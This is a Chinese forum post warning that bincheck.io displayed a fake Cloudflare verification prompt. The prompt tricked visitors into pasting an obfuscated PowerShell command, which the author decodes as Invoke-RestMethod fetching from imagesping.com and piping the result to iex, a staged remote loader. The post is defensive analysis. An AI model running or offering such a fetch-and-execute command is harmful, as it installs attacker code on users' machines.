定向投毒：bincheck.io 伪装验证码诱导执行 PowerShell 远程加载

madact

近期在访问 BIN 查询站点 https://bincheck.io/zh 时，页面出现异常“Cloudflare 验证”，并提示执行以下操作：

Win + R
Ctrl + V
Enter
该流程并非正常验证码行为，而是诱导用户在本机执行 PowerShell 命令。

命令分析结果：

使用大小写混淆
通过 FunctionName + Substring 拼接真实命令
实际执行逻辑为：
Invoke-RestMethod imagesping.com
→ iex 执行返回内容

即从远程服务器下载脚本并直接执行。

进一步测试发现：

直接浏览器访问 imagesping.com 仅返回简单 JS 代码：

{if(nav.vendor==undefined){done(" not available ");};

说明该域名存在访问环境判断机制，仅在特定条件下返回真实 payload。这属于典型的 staged loader 投递行为。
lQLPJxZdHgvsuNnNA2nNBUCwmvHyWslIto8JdjgtesdMAQ_1344_873.png (36.98 KB, 下载次数: 2)

昨天 09:47 上传

点击文件名下载附件